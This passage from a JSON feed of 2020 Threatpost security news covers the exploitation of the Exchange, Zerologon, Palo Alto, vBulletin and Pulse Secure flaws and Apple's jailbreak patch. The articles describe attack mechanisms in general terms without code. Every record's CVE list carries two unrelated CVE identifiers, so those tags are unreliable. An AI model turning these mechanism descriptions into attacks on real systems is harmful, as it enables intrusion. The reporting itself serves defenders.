[FREE](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) webinar maps out a future where modern authentication standards like WebAuthn significantly reduce a dependency on passwords. We\u2019ll also explore how teaming with Microsoft can reduced reliance on passwords. [Please register here](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>) and dare to ask, \u201c[Are passwords overrated?](<https://attendee.gotowebinar.com/register/7732731543372035596?source=art>)\u201d in this sponsored webinar. _**\n", "cvss3": {}, "published": "2020-04-07T21:19:15", "type": "threatpost", "title": "Serious Exchange Flaw Still Plagues 350K Servers", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-04-07T21:19:15", "id": "THREATPOST:DF7C78725F19B2637603E423E56656D4", "href": "https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:10:16", "description": "Proof-of-concept (PoC) exploit code has been released for a Windows flaw, which could allow attackers to infiltrate enterprises by gaining administrative privileges, giving them access to companies\u2019 Active Directory domain controllers (DCs).\n\nThe vulnerability, dubbed \u201cZerologon,\u201d is a privilege-escalation glitch ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)) with a CVSS score of 10 out of 10, making it critical in severity. The flaw was addressed in [Microsoft\u2019s August 2020 security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). However, this week at least four public PoC exploits for the flaw were released on** **[Github,](<https://github.com/dirkjanm/CVE-2020-1472>) and on Friday, researchers with Secura (who discovered the flaw) published technical details of the vulnerability.\n\n\u201cThis attack has a huge impact: It basically allows any attacker on the local network (such as a malicious insider or someone who simply plugged in a device to an on-premise network port) to completely compromise the Windows domain,\u201d said researchers with Secura, [in a Friday whitepaper](<https://www.secura.com/pathtoimg.php?id=2055>). \u201cThe attack is completely unauthenticated: The attacker does not need any user credentials.\u201d\n\n[](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)\n\nClick to register.\n\nThe flaw stems from the Netlogon Remote Protocol, available on Windows domain controllers, which is used for various tasks related to user and machine authentication.\n\nSpecifically, the issue exists in the usage of AES-CFB8 encryption for Netlogon sessions. The AES-CFB8 standard requires that each \u201cbyte\u201d of plaintext have a randomized initialization vector (IV), blocking attackers from guessing passwords. However, Netlogon\u2019s ComputeNetlogonCredential function sets the IV to a fixed 16 bits \u2013 not randomized \u2013 meaning an attacker could control the deciphered text.\n\nIn a real-world attack, attackers could send a number of Netlogon messages in which various fields are filled with zeroes, allowing them to bypass these authentication measures, and access and change the computer password of the domain controller that is stored in the Active Directory (AD), researchers said.\n\n\u201cDue to incorrect use of an AES mode of operation it is possible to spoof the identity of any computer account (including that of the [Domain Controller] itself) and set an empty password for that account in the domain,\u201d according to Secura researchers.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/15102209/microsoft-window-attack.png>)\n\nThe Zerologon attack. Credit: Secura\n\nOf note, in order to exploit this vulnerability, the attacker would need to launch the attack from a machine on the same local-area network (LAN) as their target \u2013 meaning they would already need a foothold inside the targeted network.\n\n\u201cA vulnerable client or DC exposed to the internet is not exploitable by itself,\u201d according to researchers with Tenable [in an analysis of the flaw](<https://www.tenable.com/blog/cve-2020-1472-zerologon-vulnerability-in-netlogon-could-allow-attackers-to-hijack-windows>). \u201cThe attack requires that the spoofed login works like a normal domain login attempt. Active Directory (AD) would need to recognize the connecting client as being within its logical topology, which external addresses wouldn\u2019t have.\u201d\n\nHowever, if attackers are able to exploit the flaw, they can impersonate the identity of any machine on a network when attempting to authenticate to the Domain Controller \u2013 enabling further attacks, including the complete takeover of a Windows domain, researchers said.\n\n\u201cIn a hypothetical attack, one could use this vulnerability to deploy ransomware throughout an organization and maintain a persistent presence if cleanup and restoration efforts miss any additional malicious scripts,\u201d said Tenable researchers. \u201cOrganizations with network-accessible backups could end up with a perfect storm if a ransomware group destroys backups to increase their likelihood of payout from the victim organization.\u201d\n\nWith at least four PoC exploits [now available on GitHub](<https://github.com/risksense/zerologon>), security researchers and [U.S. government authorities](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>) alike are urging admins to ensure they apply Microsoft\u2019s August patches. These patch address this problem by enforcing Secure Netlogon Remote Protocol (i.e. Netlogon signing and sealing) for all Windows servers and clients in the domain.\n\n> Yeah, I can confirm that this public exploit for Zerologon (CVE-2020-1472) works. Anybody who has not installed the patch from August's Patch Tuesday already is going to be in much worse shape than they already were.<https://t.co/SWK2hUDOYc> <https://t.co/0SDFfageQC> [pic.twitter.com/Lg8auMdtVU](<https://t.co/Lg8auMdtVU>)\n> \n> \u2014 Will Dormann (@wdormann) [September 14, 2020](<https://twitter.com/wdormann/status/1305564045282598912?ref_src=twsrc%5Etfw>)\n\nMicrosoft for its part is addressing the vulnerability in a phased rollout. The initial deployment phase started with Windows updates being released on August 11, 2020, while the second phase, planned for the first quarter of 2021, will be an \u201cenforcement phase.\u201d\n\n\u201cThe DCs will be placed in enforcement mode, which requires all Windows and non-Windows devices to use secure Remote Procedure Call (RPC) with Netlogon secure channel or to explicitly allow the account by adding an exception for any non-compliant device,\u201d said Microsoft.\n\n[**On Wed Sept. 16 @ 2 PM ET:**](<https://threatpost.com/webinars/five-essentials-for-running-a-successful-bug-bounty-program/>)** Learn the secrets to running a successful Bug Bounty Program. **[**Register today**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** for this FREE Threatpost webinar \u201c**[**Five Essentials for Running a Successful Bug Bounty Program**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)**\u201c. Hear from top Bug Bounty Program experts how to juggle public versus private programs and how to navigate the tricky terrain of managing Bug Hunters, disclosure policies and budgets. Join us Wednesday Sept. 16, 2-3 PM ET for this **[**LIVE**](<https://slack-redir.net/link?url=https%3A%2F%2Fthreatpost.com%2Fwebinars%2Ffive-essentials-for-running-a-successful-bug-bounty-program%2F>)** webinar.**\n", "cvss3": {}, "published": "2020-09-15T15:59:40", "type": "threatpost", "title": "Windows Exploit Released For Microsoft \u2018Zerologon\u2019 Flaw", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-1472", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-09-15T15:59:40", "id": "THREATPOST:23D55C85EA8B442C858FF058C5E25DBC", "href": "https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:36:18", "description": "Apple quietly pushed out a [small but important update](<https://support.apple.com/en-us/HT201222>) for operating systems across all of its devices, including a patch for a zero-day exploit used in an iPhone [jailbreak tool](<https://threatpost.com/new-ios-jailbreak-tool-works-on-iphone-models-ios-11-to-ios-13-5/156045/>) released last week.\n\nIn its notes for the release, Apple says very little else about the patches overall that it pushed out Monday \u2014 for iOS (including 13.4.6 for HomePod) and iPadOS 13.5.1, watchOS 6.2.6, tvOS 13.4.6, and macOS 10.15.5 \u2014 other than that they provide \u201cimportant security updates\u201d that are \u201crecommended for all users.\u201d\n\nA further look at the [details](<https://support.apple.com/pt-pt/HT211214>) of the iPhone updates explains that the release addresses the bug tracked as CVE-2020-9859, used in the [Unc0ver jailbreak](<https://threatpost.com/new-ios-jailbreak-tool-works-on-iphone-models-ios-11-to-ios-13-5/156045/>). The impact of the vulnerability is that \u201can application may be able to execute arbitrary code with kernel privileges.\u201d The description of the fix is that \u201ca memory-consumption issue was addressed with improved memory handling.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe update comes less than a week after hackers released the Unc0ver jailbreak tool, which they said uses a zero-day exploit to break into any iPhone, even those running the latest iOS 13.5. the hackers did not disclose which unpatched iOS flaw they use in their new tool, but they lauded it as the first zero-day jailbreak for the iPhone platform since iOS 8. [Jailbreak tools](<https://threatpost.com/checkra1n-jailbreak-stirs-concerns/150182/>) take advantage of vulnerabilities in iOS to allow users root access and full control of their device, in order to load programs and code from outside of the Apple walled garden.\n\nHowever, one [report](<https://www.vice.com/en_us/article/dyz8nw/iphone-ios-ios13-jailbreak-uncover-unc0ver>) from Vice Motherboard last week said that the jailbreak takes advantage of a kernel vulnerability, which was subsequently identified as CVE-2020-9859.\n\nThe team behind jailbreak tool said at the time that they expected Apple to find the flaw and release a patch for it, calling it the \u201cnature\u201d of the business, a hacker called [Pwn20wnd](<https://twitter.com/Pwn20wnd>) told Vice Motherboard.\n\nThe ability for a threat actor to execute arbitrary code with kernel privileges is indeed a critical security problem that Apple would want to patch as soon as possible once it\u2019s been discovered or exploited. Kernel privileges gives someone control over everything in the OS, so a hacker who uses this ability can basically take over, modify or access whatever data or functionality they choose to on someone\u2019s iOS device.\n\nSome pro-jailbreak Apple users on Twitter are encouraging users to skip the security update.\n\n\u201c_#iOS_ 13.5.1 does in fact patch the [#exploit](<https://twitter.com/hashtag/exploit?src=hashtag_click>) used for [#unc0ver](<https://twitter.com/hashtag/unc0ver?src=hashtag_click>).\u201d [tweeted](<https://twitter.com/AppleTerminal/status/1267525571128356864>) [Apple Terminal](<https://twitter.com/AppleTerminal>), an account that calls itself an \u201cindependent Apple news source.\u201d \u201cDO NOT UPDATE.\u201d\n\nOther Apple experts on Twitter encouraged people who don\u2019t want to jailbreak their iPhones to make sure they install the patch, also telling users that it fixes the latest Unc0ver jailbreak tool.\n\n\u201cApple released iOS 13.5 update fixing Zero Day exploit used by Unc0ver Jailbreak,\u201d tweeted [iRobin Pro](<https://twitter.com/iRobinPro>), an Apple expert and blogger with a YouTube channel. \u201cIf you are not going to jailbreak your iPhone or iPad, update immediately.\u201d\n\n**_Concerned about the IoT security challenges businesses face as more connected devices run our enterprises, drive our manufacturing lines, track and deliver healthcare to patients, and more? On _**[**_June 3 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_, join renowned security technologist Bruce Schneier, Armis CISO Curtis Simpson and Threatpost for a FREE webinar, _**[**_Taming the Unmanaged and IoT Device Tsunami_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_. Get exclusive insights on how to manage this new and growing attack surface. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/1837650474090338831?source=ART>)**_ for this sponsored webinar._**\n", "cvss3": {}, "published": "2020-06-02T13:53:14", "type": "threatpost", "title": "Apple Jailbreak Zero-Day Gets a Patch", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-9859"], "modified": "2020-06-02T13:53:14", "id": "THREATPOST:F547DC4A5DD1A7B486FE5B2CBD69648A", "href": "https://threatpost.com/apple-jailbreak-zero-day-patch/156201/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:17:34", "description": "The U.S. Cybersecurity and Infrastructure Security Agency (CISA) is warning that foreign hackers are likely to exploit a newly disclosed, critical vulnerability in a raft of Palo Alto Networks firewalls and enterprise VPN appliances, which allows for device takeover without authentication.\n\nThe Department of Defense (DoD) arm that oversees cyberspace operations has advised all devices affected by the flaw, CVE-2020-2021, be patched immediately. The vulnerability affects devices that use Security Assertion Markup Language (SAML), according to a [tweet](<https://twitter.com/CNMF_CyberAlert/status/1277674547542659074>) by the agency.\n\n\u201cForeign APTs will likely attempt exploit soon,\u201d U.S. Cyber Command tweeted. \u201cWe appreciate @PaloAltoNtwks\u2019 proactive response to this vulnerability.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nPalo Alto Networks on Monday [posted an advisory](<https://security.paloaltonetworks.com/CVE-2020-2021>) on the vulnerability, which affects the devices\u2019 operating systems (PAN-OS). PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL). PAN-OS 7.1 is not affected.\n\nPalo Alto already has patched the issue in PAN-OS 8.1.15, PAN-OS 9.0.9, PAN-OS 9.1.3, and all later versions, which is why CISA is urging immediate update to affected devices.\n\nThe vulnerability basically allows for authentication bypass, so threat actors can access the device without having to provide any credentials. However, hackers can only exploit the flaw when SAML authentication is enabled and the \u201cValidate Identity Provider Certificate\u201d option is disabled (unchecked), according to researchers.\n\nThis combination allows for \u201can unauthenticated network-based attacker to access protected resources\u201d through an \u201cimproper verification of signatures in PAN-OS SAML authentication,\u201d according to Palo Alto\u2019s alert.\n\n\u201cThe attacker must have network access to the vulnerable server to exploit this vulnerability,\u201d researchers added.\n\nPalo Alto provided [details](<https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u0000008UXK.>) for how users of potentially affected devices can check if their device is in the configuration that allows for exploitation of the flaw.\n\n\u201cAny unauthorized access is logged in the system logs based on the configuration; however, it can be difficult to distinguish between valid and malicious logins or sessions,\u201d researchers added in the advisory.\n\nCISA doesn\u2019t typically issue a warning on just any security flaw in vendors\u2019 enterprise products. However, the agency\u2019s cause for concern seems to be that the vulnerability has been rated the highest score on the CVSSv3 severity scale\u2014a 10 out of 10.\n\nThis rating means it is easy to exploit and doesn\u2019t require advanced technical skills. Attackers also don\u2019t need to infiltrate the device they target itself to exploit the flaw; they can do so remotely via the internet.\n\nUsers noted that they have been aware of the flaw for some time, so they also welcomed the fix from Palo Alto. \u201cThis was a great concern,\u201d [wrote](<https://twitter.com/Sihegee/status/1277677527943671809>) Twitter user [Sihegee USA / Social](<https://twitter.com/Sihegee>), who suggested that people using devices with Yhoo and AT&amp;T email services might be particularly affected by the issue. \u201cAt least now we have a patch.\u201d\n\nWhen updating affected devices, people should ensure that the signing certificate for their SAML identity provider is configured as the \u201cIdentity Provider Certificate\u201d before upgrading, to ensure that users of the device can continue to authenticate successfully, according to Palo Alto.\n\nDetails of all actions required before and after upgrading PAN-OS are available from the company [online](<https://knowledgebase.paloaltonetworks.com/KCSArticleDetail?id=kA14u0000008UXK>).\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-30T13:48:47", "type": "threatpost", "title": "CISA: Nation-State Attackers Likely to Take Aim at Palo Alto Networks Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-2021", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-06-30T13:48:47", "id": "THREATPOST:14236108003AC6A3E1AB861A15ECA88F", "href": "https://threatpost.com/cisa-nation-state-attackers-palo-alto-networks-bug/157013/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-16T22:18:50", "description": "A security researcher has published proof-of-concept code to outsmart a patch issued last year for a zero-day vulnerability discovered in vBulletin, a popular software for building online community forums.\n\nCalling a patch for the flaw a \u201cfail\u201d and \u201cinadequate in blocking exploitation,\u201d Austin-based security researcher Amir Etemadieh published details and examples of exploit code on three developer platforms\u2013 Bash, Python and Ruby\u2013for the patch in a post published [Sunday night](<https://blog.exploitee.rs/2020/exploiting-vbulletin-a-tale-of-patch-fail/>).\n\nOn September 23, 2019, an unidentified security researcher released [exploit code](<https://threatpost.com/exploits-critical-vbulletin-rce-bug/148712/>) for a flaw that allowed for PHP remote code execution in vBulletin 5.0 through 5.4, Etemadieh wrote.\n\n[](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)\n\nClick to register!\n\nThe zero-day, [CVE-2019-16759](<https://www.cvedetails.com/cve/CVE-2019-16759/>), is called a pre-auth RCE bug, which can allow an attacker to run malicious code and take over forums without needing to authenticate on the sites that are under attack.\n\n\u201cThis bug (CVE-2019-16759) was labeled as a \u2018bugdoor\u2019 because of its simplicity by a [popular vulnerability broker](<https://twitter.com/cbekrar/status/1176803541047861249?>) and was marked with a [CVSS 3.x score of 9.8](<https://nvd.nist.gov/vuln/detail/CVE-2019-16759>) giving it a critical rating,\u201d he said in the post.\n\nA patch was issued two days later, Sept. 25, 2019, that \u201cseemed, at the time, to fix the proof of concept exploit provided by the un-named finder,\u201d Etemadieh said.\n\nIt appears that it didn\u2019t however, as Etemadieh outlined how it can be bypassed on the three developer platforms in three separate proof-of-concepts.\n\nThe key problem with the patch issued for the zero day is related to how the vBulletin template system is structured and how it uses PHP, he wrote in the post.\n\n\u201cTemplates aren\u2019t actually written in PHP but instead are written in a language that is first processed by the template engine and then is output as a string of PHP code that is later ran through an eval() during the \u2018rendering\u2019 process,\u201d according to the post. \u201cTemplates are also not a standalone item but can be nested within other templates, in that one template can have a number of child templates embedded within.\u201d\n\nThe patch is \u201cshort-sighted\u201d because it faces problems when encountering a user-controlled child template, Etemadieh wrote. In this case, a parent template will be checked to verify that the routestring does not end with a widget_php route, Etemadieh said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/08/11080636/vbulletin-site.png>)\u201cHowever we are still prevented from providing a payload within the widgetConfig value because of code within the rendering process, which cleans the widgetConfig value prior to the templates execution,\u201d he wrote in his post.\n\nEtemadieh goes on to show how another template that appears in the patch is \u201ca perfect assistant in bypassing the previous CVE-2019-16759 patch\u201d thanks to two key features: the template\u2019s ability to load a user-controlled child template, and how it loads the child template by taking a value from a separately named value and placing it into a variable named \u201cwidgetConfig.\u201d\n\n\u201cThese two characteristics of the \u2018widget_tabbedcontainer_tab_panel\u2019 template allow us to effectively bypass all filtering previously done to prevent CVE-2019-16759 from being exploited,\u201d he wrote.\n\nIt\u2019s unclear if Etemadieh informed vBulletin before posting the workarounds; however, a [report](<https://www.zdnet.com/article/security-researcher-publishes-details-and-exploit-code-for-a-vbulletin-zero-day/>) in ZDNet suggests that he did not. No matter, he did provide a quick fix for his bypass of the patch in his post, showing how to disable PHP widgets within vBulletin forums that \u201cmay break some functionality but will keep you safe from attacks until a patch is released by vBulletin,\u201d he wrote.\n\nTo apply the fix, administrators should:\n\n 1. Go to the vBulletin administrator control panel.\n 2. Click \u201cSettings\u201d in the menu on the left, then \u201cOptions\u201d in the dropdown.\n 3. Choose \u201cGeneral Settings\u201d and then click \u201cEdit Settings\u201d\n 4. Look for \u201cDisable PHP, Static HTML, and Ad Module rendering\u201d, Set to \u201cYes\u201d\n 5. Click \u201cSave\u201d\n\nOnline forums are a popular target for hackers because of they typically have a wide and diverse user base and store a large amount of personally identifiable information about those users.\n\nIndeed, hackers wasted no time in using Etemadieh\u2019s bypass to try to hack into the forum at the DEF CON security conference, according to a [post on Twitter](<https://twitter.com/thedarktangent/status/1292813958332596224>) by DEFCON and Black Hat founder [Jeff Moss](<DEF%20CON%20and%20Black%20Hat>). However, administrators quickly applied Etemadieh\u2019s advice to disable PHP to thwart the attack, he tweeted.\n\n\u201cDisable PHP rendering to protect yourself until patched!\u201d Moss advised.\n\n_**Complimentary Threatpost Webinar**__: Want to learn more about Confidential Computing and how it can supercharge your cloud security? This webinar \u201c**[Cloud Security Audit: A Confidential Computing Roundtable](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**\u201d brings top cloud-security experts from Microsoft and __Fortanix together to explore how **Confidential Computing** is a game changer for securing dynamic cloud data and preventing IP exposure. Join us **[Wednesday Aug. 12 at 2pm ET](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>) **for this** FREE **live webinar with Dr. David Thaler, software architect, Microsoft and Dr Richard Searle, security architect, Fortanix \u2013 both with the Confidential Computing Consortium. **[Register Now](<https://attendee.gotowebinar.com/register/3844090971254297614?source=art>)**._\n", "cvss3": {}, "published": "2020-08-11T12:09:30", "type": "threatpost", "title": "Researcher Publishes Patch Bypass for vBulletin 0-Day", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-16759", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-08-11T12:09:30", "id": "THREATPOST:01643D93E5C8B6F18CEF9BF8FA7BFF89", "href": "https://threatpost.com/researcher-publishes-bypass-for-patch-for-vbulletin-0-day-flaw/158232/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-10-15T22:23:09", "description": "Multiple threat groups are actively exploiting a vulnerability in Microsoft Exchange servers, researchers warn. If left unpatched, the flaw allows authenticated attackers to execute code remotely with system privileges.\n\nThe vulnerability in question (CVE-2020-0688) exists in the control panel of Exchange, Microsoft\u2019s mail server and calendaring server, and was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates. However, researchers [in a Friday advisory](<https://www.volexity.com/blog/2020/03/06/microsoft-exchange-control-panel-ecp-vulnerability-cve-2020-0688-exploited/>) said that unpatched servers are being exploited in the wild by unnamed advanced persistent threat (APT) actors.\n\n\u201cWhat we have seen thus far are multiple Chinese APT group exploiting or attempting to exploit this flaw,\u201d Steven Adair, founder and president of Volexity, told Threatpost. \u201cHowever, I think it is safe to say that this exploit is now in the hands of operators around the world and unfortunately some companies that have not patched yet or did not patch quickly enough are likely to pay the price.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nAttacks first started late February and targeted \u201cnumerous affected organizations,\u201d researchers said. They observed attackers leverage the flaw to run system commands to conduct reconnaissance, deploy webshell backdoors and execute in-memory frameworks post-exploitation.\n\n## The Flaw\n\nAfter Microsoft patched the flaw in February researchers with the Zero Day Initiative (ZDI), which first reported the vulnerability, [published further details](<https://www.zerodayinitiative.com/blog/2020/2/24/cve-2020-0688-remote-code-execution-on-microsoft-exchange-server-through-fixed-cryptographic-keys>) of the flaw and how it could be exploited. And, on March 4, Rapid7 published a module that incorporated the exploit into the Metasploit penetration testing framework.\n\nThe vulnerability exists in the Exchange Control Panel (ECP), a web-based management interface for administrators, introduced in Exchange Server 2010. Specifically, instead of having cryptographic keys that are randomly generated on a per-installation basis, all installations in the configuration of ECP have the same cryptographic key values. These cryptographic keys are used to provide security for ViewState (a server-side data that ASP.NET web applications store in serialized format on the client).\n\nAccording to ZDI, an attacker could exploit a vulnerable Exchange server if it was unpatched (before Feb. 11, 2020), if the ECP interface was accessible to the attacker, and if the attacker has a working credential allowing them to access the ECP. After accessing the ECP using compromised credentials, attackers can take advantage of the fixed cryptographic keys by tricking the server into deserializing maliciously crafted ViewState data, then allowing them to take over Exchange server.\n\n\u201cWe realized the severity of this bug when we purchased it,\u201d Brian Gorenc, director of vulnerability research and head of Trend Micro\u2019s ZDI program told Threatpost via email. \u201cThat\u2019s why we worked with Microsoft to get it patched through coordinated disclosure, and it\u2019s why we provided defenders detailed information about it through our blog. We felt Exchange administrators should treat this as a Critical patch rather than Important as labelled by Microsoft. We encourage everyone to apply the patch as soon as possible to protect themselves from this vulnerability.\u201d\n\n## Brute Force\n\nResearchers said, while an attacker would need a credential to leverage the exploit, the credential does not need to be highly privileged or even have ECP access.\n\nAfter technical details of the flaw were disclosed, researchers said they observed multiple APT groups attempting to brute force credentials by leveraging Exchange Web Services (EWS), which they said was likely an effort to exploit this vulnerability.\n\n\u201cWhile brute-forcing credentials is a common occurrence, the frequency and intensity of attacks at certain organizations has increased dramatically following the vulnerability disclosure,\u201d researchers said.\n\nResearchers said they believe these efforts to be sourced from \u201cknown APT groups\u201d due to the overlap of their IP addresses from other, previous attacks. Also, in some cases, the credentials used were tied to previous breaches by the APT groups.\n\n## Going Forward\n\nIn the coming months, Adair told Threatpost he suspects there could easily be hundreds of organizations being hit with this exploit.\n\n\u201cFrom our perspective the successful attacks we have seen are just a handful of different servers and organizations,\u201d Adair said. \u201cHowever, I would expect that attackers have been access compromised credentials all around the world and are not able to make better use of them.\u201d** **\n\nResearchers encourage organizations to ensure that they\u2019re up to date on security updates from Microsoft, as well as place access control list (ACL) restrictions on the ECP virtual directory or via any web application firewall capability. Firms should also continue to expire passwords and require users to update passwords periodically, researchers said.\n\n\u201cThis vulnerability underscores such a case where an organization can be locked down, have properly deployed 2FA, and still have an incident due to outdated or weak password,\u201d said researchers.\n\n**_Interested in security for the Internet of Things and how 5G will change the threat landscape? Join our free Threatpost webinar, [\u201c5G, the Olympics and Next-Gen Security Challenges,\u201d](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>) as our panel discusses what use cases to expect in 2020 (the Olympics will be a first test), why 5G security risks are different, the role of AI in defense and how enterprises can manage their risk. [Register here](<https://attendee.gotowebinar.com/register/3191336203359293954?source=art>)._**\n\n**Share this article:**\n\n * [Hacks](<https://threatpost.com/category/hacks/>)\n", "cvss3": {}, "published": "2020-03-09T18:01:41", "type": "threatpost", "title": "Microsoft Exchange Server Flaw Exploited in APT Attacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-0688", "CVE-2020-24400", "CVE-2020-24407"], "modified": "2020-03-09T18:01:41", "id": "THREATPOST:F54F8338674294DE3D323ED03140CB71", "href": "https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-10-15T22:21:11", "description": "The Department of Homeland Security (DHS) is urging companies that use Pulse Secure VPNs to change their passwords for Active Directory accounts, after several cyberattacks targeted companies who had previously patched a related flaw in the VPN.\n\nDHS warns that the Pulse Secure VPN patches may have come too late. Government officials say before the patches were deployed, bad actors were able to compromise Active Directory accounts. So even those who have patched for the bug could still be compromised and are vulnerable to attack.\n\nAt the heart of the advisory is a known, critical Pulse Secure [arbitrary file reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers to gain access to a victim\u2019s networks. Tracked as CVE-2019-11510, the bug was patched by Pulse Secure in April 2019, and many companies impacted by the flaw issued the fix to address the vulnerability since then.\n\nBut in many cases the damage is already done. Attackers have already exploited the flaw to snatch up victims\u2019 credentials \u2013 and now are using those credentials to move laterally through organizations, DHS\u2019 Cybersecurity and Infrastructure Security Agency (CISA) warned in the Thursday alert.\n\n[](<https://register.gotowebinar.com/register/4136632530104301068?source=art>)\n\n\u201cCISA strongly urges organizations that have not yet done so to upgrade their Pulse Secure VPN to the corresponding patches for CVE-2019-11510,\u201d according to [CISA\u2019s alert](<https://www.us-cert.gov/ncas/alerts/aa20-107a>). \u201cIf\u2014after applying the detection measures in this alert\u2014organizations detect evidence of CVE-2019-11510 exploitation, CISA recommends changing passwords for all Active Directory accounts, including administrators and services accounts.\u201d\n\nThe flaw exists in Pulse Connect Secure, Pulse Secure\u2019s SSL VPN (virtual private network) platform used by various enterprises and organizations. Exploitation of the vulnerability is simple, which is why it received a 10 out of 10 CVSS ranking. Attackers can exploit the flaw to get initial access on the VPN server, where they\u2019re able to access credentials. A proof of concept (PoC) [was made public](<https://www.tenable.com/blog/cve-2019-11510-proof-of-concept-available-for-arbitrary-file-disclosure-in-pulse-connect-secure>) in August 2019. During that time, Troy Mursch with Bad Packets identified [over 14,500 Pulse Secure VPN endpoints that were vulnerable](<https://badpackets.net/over-14500-pulse-secure-vpn-endpoints-vulnerable-to-cve-2019-11510/>) to this flaw. In a more recent scan, [on Jan. 3, 2020](<https://twitter.com/bad_packets/status/1213273678525296640>), Mursch said 3,825 endpoints remain vulnerable.\n\nOne such vulnerable organization was Travelex, which took several months to patch critical vulnerabilities in its seven Pulse Secure VPN servers, according to Bad Packets. Some have speculated the [lag time in patching](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) these VPNs led to the eventual [massive ransomware](<https://threatpost.com/travelex-knocked-offline-malware-attack/151522/>) attack against Travelex.\n\nVarious other cybercriminals have targeted the Pulse Secure VPN flaw to compromise organizations, such as Iranian state sponsored hackers who leveraged the flaw to [conduct cyber-espionage campaigns](<https://www.clearskysec.com/fox-kitten/>) against dozens of companies in Israel.\n\nIn addition to urging organizations update credentials on accounts in Active Directory, which is the database keeps track of all organizations\u2019 user accounts and passwords, CISA has also [released a new tool](<https://github.com/cisagov/check-your-pulse>) to help network admins sniff out any indicators of compromise on their systems that are related to the flaw.\n\n\u201cCISA encourages network administrators to remain aware of the ramifications of exploitation of CVE-2019-11510 and to apply the detection measures and mitigations provided in this report to secure networks against these attacks,\u201d the advisory said.\n\n**_Worried about your cloud security in the work-from-home era? On _****_April 23 at 2 p.m. ET_****_, join DivvyCloud and Threatpost for a FREE webinar, _**[**_A Practical Guide to Securing the Cloud in the Face of Crisis_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)**_. Get exclusive research insights and critical, advanced takeaways on how to avoid cloud disruption and chaos in the face of COVID-19 \u2013 and during all times of crisis. _**[**_Please register here_**](<https://attendee.gotowebinar.com/register/4136632530104301068?source=art>)_** for this sponsored webinar.**_\n\n**Share this article:**\n\n * [Hacks](<https://threatpost.com/category/hacks/>)\n * [Vulnerabilities](<https://threatpost.com/category/vulnerabilities/>)\n", "cvss3": {}, "published": "2020-04-17T20:56:34", "type": "threatpost", "title": "DHS Urges Pulse Secure VPN Users To Update Passwords", "bulletinFamily": "info", "cvss2": {}, "cvelist": 